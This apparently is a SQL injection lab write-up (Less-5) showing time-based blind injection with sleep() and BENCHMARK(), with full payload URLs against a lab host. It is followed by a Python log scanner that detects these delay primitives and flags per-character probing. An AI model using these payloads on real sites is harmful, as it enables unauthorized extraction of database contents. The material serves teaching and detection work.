Less5
Below, the lesson is demonstrated with time-based blind injection.

Using the sleep() function

SQL statement:

and If(ascii(substr(database(),1,1))=116,1,sleep(5))

Payload request:

http://47.101.62.20:11567/Less-5/?id=1%27and%20If(ascii(substr(database(),1,1))=116,1,sleep(5))--+

When the ASCII value of the first character of database() is not 116, the query sleeps for 5 s and the page comes back empty. Changing 116 to 115 here yields the correct (undelayed) response.

Time-based injection using BENCHMARK()

SQL statement:

UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1

Payload request:

http://47.101.62.20:11567/Less-5/?id=1%27UNION%20SELECT%20(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)),null)),2,3%20FROM%20(select%20database()%20as%20current)%20as%20tb1--+

Here the response is delayed by about 5 s when the condition is true, and returns without delay when it is false.
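As an added defender-side example (not part of the original writeup), the following Python scans web access-log lines for the two delay primitives used above, sleep() and BENCHMARK(), URL-decoding the query string first so the encoded payloads are seen in clear, and then flags clients that issue repeated delay probes, since blind enumeration needs one probe per character. The log lines, client addresses and the threshold of two probes are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed common-log-format lines (sample data, not from the original page).
# Lines 2 and 3 carry the sleep() and BENCHMARK() probe shapes discussed above.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 712
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1%27and%20If(ascii(substr(database(),1,1))=116,1,sleep(5))--+ HTTP/1.1" 200 0
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-5/?id=1%27UNION%20SELECT%20(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)),null)),2,3%20FROM%20(select%20database()%20as%20current)%20as%20tb1--+ HTTP/1.1" 200 0
198.51.100.2 - - [01/Jan/2024:10:00:10 +0000] "GET /Less-5/?id=42 HTTP/1.1" 200 698
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$')
# Delay primitives of time-based blind injection: MySQL sleep()/BENCHMARK() as on
# this page, plus the PostgreSQL and MSSQL equivalents so the rule is not engine-bound.
DELAY_RE = re.compile(r'\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.I)
# Structural tell: a closing quote followed by a boolean/UNION keyword, or a comment
# terminator, neither of which a legitimate numeric id parameter ever needs.
STRUCTURE_RE = re.compile(r"'\s*(and|or|union)\b|--\s*$|#", re.I)

def decode_query(target):
    """URL-decode the query string, repeating until stable so double encoding is unwrapped."""
    qs, prev = urlsplit(target).query, None
    while qs != prev:
        prev, qs = qs, unquote_plus(qs)
    return qs

def scan_line(line):
    """Return a finding for one log line, or None when no delay primitive is present."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m['target'])
    delay = DELAY_RE.search(query)
    if not delay:
        return None
    return {'client': m['client'], 'path': urlsplit(m['target']).path,
            'delay_function': delay.group(0).split('(')[0].strip().lower(),
            'structural_tell': bool(STRUCTURE_RE.search(query)), 'query': query}

def scan_log(text, threshold=2):
    """Return (findings, suspicious_clients); a client is suspicious once it has
    issued `threshold` or more delay probes, the signature of per-character enumeration."""
    findings = [f for f in (scan_line(l) for l in text.splitlines()) if f]
    per_client = {}
    for f in findings:
        per_client[f['client']] = per_client.get(f['client'], 0) + 1
    return findings, sorted(c for c, n in per_client.items() if n >= threshold)

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG)[0]:
        print(f['client'], f['path'], f['delay_function'], f['structural_tell'])
```

In production the same check would run over the decoded query at the WAF or log pipeline, and the latency column (where the server records it) gives a second signal: a 5 s response to a path that normally answers in milliseconds.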